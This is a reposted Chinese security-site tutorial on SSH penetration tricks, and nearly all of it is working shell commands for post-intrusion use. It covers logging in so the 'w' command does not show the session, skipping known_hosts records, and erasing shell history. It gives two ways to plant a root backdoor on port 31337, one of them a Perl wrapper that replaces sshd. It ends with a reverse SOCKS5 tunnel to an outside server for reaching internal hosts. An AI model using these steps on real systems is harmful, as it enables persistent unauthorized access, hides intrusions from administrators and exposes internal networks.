热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全

ssh渗透技巧及相关操作

发布时间:2015-10-29 16:15文章来源:wooyun文章作者:秩名 点击次数:
摘要:我一般先这么登录,不让对方执行w的时候看到我 ssh -T root@8.8.8.8 bin/sh -i 还有一个技巧:远程登录时防止被记录到know hosts文件(默认为~/.ssh/know hosts) ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i 远程登录SSH后第一件事 uns...

 我一般先这么登录,不让对方执行w的时候看到我

ssh -T root@8.8.8.8 bin/sh -i

还有一个技巧:远程登录时防止被记录到knowhosts文件(默认为~/.ssh/knowhosts)

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i

远程登录SSH后第一件事

unset HISTFILE;export HISTFILE=;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;export HISTIGNORE=*;export HISTCONTROL=ignorespace

常见的两种方法建立SSH后门

1.后门端口为31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆

mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

2.使用源端口31337登录,就可以获得SHELL,端口还是默认的SSH端口

[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

用SSH做socks5代理,并且转发到公网的IP

ssh -fND 127.0.0.1:8888 mickey@127.0.0.1   

做SOCKS5代理,这里需要提供一个SSH登录账号

ssh -fNR 8888:127.0.0.1:8888 mickey@8.8.8.8

把socks5代理反弹到你公网的SSH服务器,这里输入的是你公网SSH服务器的vpn用户的密码

最后在本地设置SOCKS5代理,127.0.0.1:8888 就能连接内网任意的服务器了。

标签分类:

上一篇:各种语言一句话反弹shell方法
下一篇:主动欺骗蜜罐系统Beeswarm简介